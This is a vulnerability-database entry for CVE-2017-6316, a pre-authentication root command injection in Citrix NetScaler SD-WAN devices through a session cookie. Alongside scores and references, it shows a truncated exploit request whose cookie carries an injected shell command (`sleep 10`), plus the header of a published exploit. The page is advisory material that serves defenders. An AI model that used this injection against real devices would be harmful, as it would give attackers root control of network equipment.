Published: 20/07/2017 Updated: 16/09/2017

CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 1000

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote malicious users to execute arbitrary shell commands as root via a CGISESSID cookie. On CloudBridge (the former name of NetScaler SD-WAN) devices, the cookie name was CAKEPHP rather than CGISESSID.

Vulnerable Product	Search on Vulmon	Subscribe to Product
citrix netscaler sd-wan

POST /cgi-bin/logincgi?redirect=/ HTTP/11 Host: 10242129149 Accept: */* Accept-Language: en User-Agent: Mozilla/50 (compatible; MSIE 90; Windows NT 61; Win64; x64; Trident/50) Connection: close Referer: 10242129149/cgi-bin/logincgi?redirect=/ Cookie: CAKEPHP=`sleep 10` Content-Type: application/x-www-form-urlencoded Content-Len ...

# Exploit Title: Citix SD-WAN logout cookie preauth Remote Command Injection Vulnerablity # Date: 02/20/2017 # Exploit Author: xort @ Critical Start # Vendor Homepage: wwwcitrixcom # Software Link: wwwcitrixcom/downloads/cloudbridge/ # Version: 91226561201 # Tested on: 91226561201 (OS partition 46) # # CVE : (await ...

CWE-20 https://www.exploit-db.com/exploits/42346/https://www.exploit-db.com/exploits/42345/http://www.securityfocus.com/bid/99943 http://www.securitytracker.com/id/1039019 https://support.citrix.com/article/CTX225990 https://nvd.nist.gov https://www.exploit-db.com/exploits/42346/

CVE-2017-6316

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect